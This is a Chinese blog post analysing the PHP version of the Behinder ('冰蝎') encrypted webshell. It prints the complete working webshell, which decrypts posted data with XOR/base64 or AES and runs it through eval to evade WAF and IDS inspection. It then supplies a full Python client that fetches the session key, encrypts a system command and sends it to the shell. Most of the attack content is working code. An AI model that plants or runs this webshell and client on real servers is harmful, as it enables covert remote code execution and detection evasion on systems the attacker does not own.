冰蝎一句话分析

最新推荐文章于 2024-04-16 07:36:50 发布
最新推荐文章于 2024-04-16 07:36:50 发布
阅读量4.6k 收藏 5
点赞数 3
分类专栏: web 文章标签: python php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/109060092
版权

“冰蝎”php一句话木马分析

“冰蝎”是什么?它是一款动态二进制加密网站管理客户端,它可以在HTTP明文协议中建立加密隧道,可以用于躲避传统的WAF、IDS等设备的检测。项目地址:

https://github.com/rebeyond/Behinder

“冰蝎”一句话木马可由Java、php、.net等语言来实现,我们以php为例来看这种新型的php一句话木马的实现:

<?php
@error_reporting(0);
session_start();
//如果接收到pass参数,则会生成16位的随机秘钥,存储到session中
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
//如果没接收到pass参数,则利用存储到session的秘钥进行解密
else
{
    $key=$_SESSION['k'];
    //接收POST来的加密后的待执行命令
	$post=file_get_contents("php://input");
    //如果不能加载openssl扩展,则使用base64解码
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
    //使用openssl进行AES解密
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    /*
    将解密后的$Ppost以`|`分割为数组;例如$post为assert|eval('phpinfo();'),那么分割后为:
    array("assert", "eval('phpinfo();')")
    */
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __construct($p) {eval($p."");}}
    //创建C类,利用__construct中的eval来执行解密后的值
	@new C($params);
}
?>

生成密钥

if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}

以get的形式访问木马,就会得到一个16位的密钥,生成的方式很简单

substr(md5(uniqid(rand())),16);

在服务器上的session

image-20201013202201724

解密代码

这里面有两种解密的方式:

如果服务端开启了openssl 直接使用AES128加密方式 密钥已知

如果没有使用openssl直接使用代码和key异或

我们今天先来研究第二种加密的方式,简单的base64解密之后异或

if(!extension_loaded('openssl')) 
    {
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }

代码执行

$arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __construct($p) {eval($p."");}}
    @new C($params);

这一部分也比较简单

先使用|拆解

然后执行第儿部分的代码

以上三个方面就是对冰蝎服务端的分析了,要是想使用python作为简单的服务端的话,按照逆向思维的步骤其实很简单也有三个步骤:

代码构造

直接在页面上就可以获取:类似这样

key = s.get(url).text

使用php写了写解密的代码

解密的代码如下:

<?php
    {   
        $key = 'ef74d2c21f1b391a';
        $post = 'B0RHAUAXTlQQUA4bW1ASAFADawBXAF1VAxlFaW5/Dgcfdl88Ay10ZFd/KGcJBAMvVERaPGYQDxZPGFk=';
        $t="base64_"."decode";
        $post=$t($post."");

        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; }
                print $post;
    }

?>

最后得到的结果是

assert|eval(base64_decode('ZWNobyAkX1NFU1NJT05bJ2snXTs='));

也就说,我们也执行的代码的数据格式就是这个样子的,

assert|eval(base64_decode('ZWNobyAkX1NFU1NJT05bJ2snXTs='));
首先是加密

原封不动的解密一下就好:

一个数连续两次异或另外一个数还是他自己,类似这样的函数:

def jiami(key,text):
    miwen = ''
    for i in range(0,len(text)):
        miwen = miwen+chr(ord(text[i])^ord(key[((i+1)&15)]))
    return base64.b64encode(miwen.encode("utf-8"))
然后是传输

post传输

类似这样

payload = miwen
req = s.post(host,data = payload)

python连接冰蝎脚本

import requests
import sys
import os
import re
import base64
host = "http://localhost/bingxie/muma.php"
pwd = 'pass'
cmd = "system('whoami');"
cmd = base64.b64encode(cmd.encode('utf-8')).decode('utf-8')
cmd = "assert|eval(base64_decode('{}'));".format(cmd)
def jiami(key,text):  #解密
    miwen = ''
    for i in range(0,len(text)):
        miwen = miwen+chr(ord(text[i])^ord(key[((i+1)&15)]))
    return base64.b64encode(miwen.encode("utf-8"))
s = requests.Session()
url = host+"?"+pwd+"=1"
print(url)
key = s.get(url).text
miwen  = str(jiami(key,cmd))[2:-1]
print(miwen)
payload = miwen
req = s.post(host,data = payload)
print(req.content.decode('utf-8'))

image-20201013202252473

参考文章:

https://xz.aliyun.com/t/6520

https://www.jianshu.com/p/fe8e2c493ffe

http://gtfly.top/2019/11/18/2019-11-18-%E8%AE%B0%E4%B8%80%E6%AC%A1%E2%80%9C%E5%86%B0%E8%9D%8E%E2%80%9D%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/

https://xz.aliyun.com/t/2774

1/18/2019-11-18-%E8%AE%B0%E4%B8%80%E6%AC%A1%E2%80%9C%E5%86%B0%E8%9D%8E%E2%80%9D%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/)

https://xz.aliyun.com/t/2774

西部壮仔
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jsp一句话总结
weixin_45486362的博客
06-25 5377
** 基本原理 ** 由于Java中没有所谓的eval函数,无法对直接传递的代码进行解析执行。所以不管是蚁剑还是菜刀对于JSP的shell一直是采用custom模式,即把要执行的代码提前写在shell中,然后每次只需要传递要调用的函数名以及对应的参数即可。 虽然可以实现相应的功能,但是带来一个问题就是shell体积非常巨大。菜刀的jsp脚本有7kb大小,蚁剑的jsp custom脚本即使去掉注释后还有17k之多,用起来非常的不方便。 冰蝎的作者rebeyond大佬在文章 利用动态二进制加密实现新型一句话木马
php冰蝎一句话,利用动态二进制加密实现新型一句话木马之PHP篇(转)冰蝎
weixin_32550525的博客
04-05 833
概述本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是:利用动态二进制加密实现新型一句话木马之Java篇利用动态二进制加密实现新型一句话木马之.net篇利用动态二进制加密实现新型一句话木马...
冰蝎利用免杀webshell链接,反弹shell(附免杀webshell和工具)
qq_41132792的博客
09-06 2070
我们这里需要的是java环境,版本的话最好就是安装Java最新的了,Windows也是可以使用的,我这里主要介绍的是Linux上使用,我是基于kali中使用的。我们因为是实验的关系,本地搭建一个网站就好了,Windows的选择phpstudy就好,Linux的百度一下安装下apache即可。然后会弹出我们的图形界面,这里我们就先停一下,将我们的木马传到/var/www/html这个文件夹中,这里我们可以自定义请求头,然后保存即可,保存完我们双击进去。首先我们启动冰蝎,这里我将它放到了我的工具包中,
冰蝎php马静态免杀
qq_61807674的博客
04-02 1187
其实还有小马哥的腾讯哈勃,但是那个不支持上传webshell,上传压缩包虽然行,但是如果压缩一遍了连冰蝎原马都查杀不出来,就当图一乐了,就不放出来了.....大部分云沙箱和在线查杀我都基本试过了,基本除了安恒云沙箱都能稳过(ah一生之敌),因为我的测试环境是php7.3往上了,没法用assert拼接执行,估计是检测到了eval执行字符串代码,所以静态检测没过,太丢脸就不放截图啦,师傅们可以按着自己的想法改改试试()但是也正常,只是做了基础的静态免杀而已,其实处理还是不够到位的,心态要端正,很不错了!
冰蝎的原理与安装使用,2024年最新熬夜整理蚂蚁金服网络安全高级笔试题
最新发布
2401_83739472的博客
04-16 1108
这个也是冰蝎的固定格式,
php冰蝎一句话,冰蝎3.0-分析系列 1-beta2-php
weixin_40000131的博客
04-05 350
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0Mozilla/5.0 (Windows NT ...
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
记一次对“冰蝎一句话木马流量的分析
蚁景网安学院
11-18 1787
预备知识“冰蝎php一句话木马分析冰蝎”是什么?它是一款动态二进制加密网站管理客户端,它可以在HTTP明文协议中建立加密隧道,可以用于躲避传统的WAF、IDS等设备的检测。项目地址:...
【原创】利用动态二进制加密实现新型一句话木马之Java篇
weixin_34364071的博客
05-24 1111
概述 本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。 本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是: 利用动态二进制加密实现新型一句话木马之Java篇 利用动态二进制加密实现新型一句话木马之.net篇 利用动态二进制加密实现新型...
【原创】利用动态二进制加密实现新型一句话木马之PHP
weixin_34415923的博客
05-24 576
概述 本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。 本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是: 利用动态二进制加密实现新型一句话木马之Java篇 利用动态二进制加密实现新型一句话木马之.net篇 利用动态二进制加密实现新型...
Java安全-Java Web后门学习 Jsp 一句话分析
Love&Share
05-03 2359
文章目录Java Web后门一句话木马反射调用类加载(冰蝎马实现方式)ELSE参考 Java Web后门 Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用 Java 中常用的命令执行函数 java.lang.Runtime.exec() java.lang.ProcessBuilder.start() 一句话木马 最简单的 jsp 一句话木马 <% Runtime.getRuntime().exec(request.getParameter("i"));%> .
jspshell 一句话
07-24
jsp shell
PHP一句话 免杀版
10-23
PHP一句话 免杀版
WebShell管理工具
07-12
WebShell管理工具 一款不错的WEBSHELL管理及后门是否存在检测工具
PHP灵魂一句话3.0内部版
11-13
PHP灵魂一句话3.0内部版
一道冰蝎文件流量分析的例题
09-01
冰蝎(Scapy)是一种强大的网络协议交互工具,它允许用户创建、操作和发送几乎任何网络协议包。在网络安全领域,尤其是CTF(Capture The Flag)竞赛中,冰蝎经常被用于流量分析、数据包嗅探和网络取证。本题目的核心...
冰蝎V4.1Behinder
03-11
冰蝎V4.1 Behinder】是一款知名的Webshell工具,主要用于网络安全测试和渗透测试领域。Webshell,也称为Web后门,是一种通过Web应用程序漏洞植入的恶意代码,允许远程控制服务器。冰蝎(Behinder)是这类工具的...
强大的webshell管理工具——冰蝎
12-26
冰蝎(Behinder)是一款专为WebShell管理设计的强大工具,它以其高效、稳定和功能全面的特点受到了不少安全研究者的关注。 一、冰蝎的特性与优势 1. **全面的WebShell支持**:冰蝎能够管理和控制多种类型的...
冰蝎v3.0-beta7
08-31
冰蝎3.0
如何识别冰蝎webshell文件
07-14
识别冰蝎冰蝎RAT)Webshell 文件可以是一项复杂的任务,因为这种 Webshell 文件通常会采用各种隐蔽和加密技术来逃避检测。以下是一些常见的方法和指南,可用于帮助识别冰蝎 Webshell 文件: 1. 文件名和路径:冰蝎 Webshell 文件通常会使用伪装性强的文件名和路径,以掩盖其真实用途。一些常见的文件名可能包括类似于 "index.php.bak" 或 "config.php.bak" 的后缀。 2. 文件内容:冰蝎 Webshell 文件的内容通常会包含加密、编码或混淆的代码。这些代码可能会使用变量替换、字符串拼接等技术来隐藏其真实功能。您可以检查文件内容中是否存在可疑的、与正常网页文件不符合的代码段。 3. HTTP 请求特征:冰蝎 Webshell 文件通常通过 HTTP 协议与远程控制服务器通信。您可以检查文件中是否存在与远程控制服务器通信相关的特征,如特定的 URL、POST 或 GET 请求等。 4. 常见指纹:冰蝎 Webshell 是一种常见的 Webshell 类型,有许多安全工具和脚本可以帮助您识别这种类型的 Webshell。例如,一些Webshell扫描器可以通过检查文件的特定特征或指纹来识别冰蝎 Webshell 文件。 5. 安全工具:使用安全工具进行扫描和检测,如安全防护软件、Web应用程序防火墙(WAF)等。这些工具可以帮助您自动检测和识别冰蝎 Webshell 文件。 除了上述方法,还有许多其他技术和工具可用于识别冰蝎 Webshell 文件。然而,鉴于冰蝎 Webshell 的变种和不断演变,没有一种方法可以完全保证识别所有的冰蝎 Webshell。因此,如果您怀疑系统中存在冰蝎 Webshell 文件,最好寻求专业的安全专家或安全团队的帮助来进行详细的分析和处理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值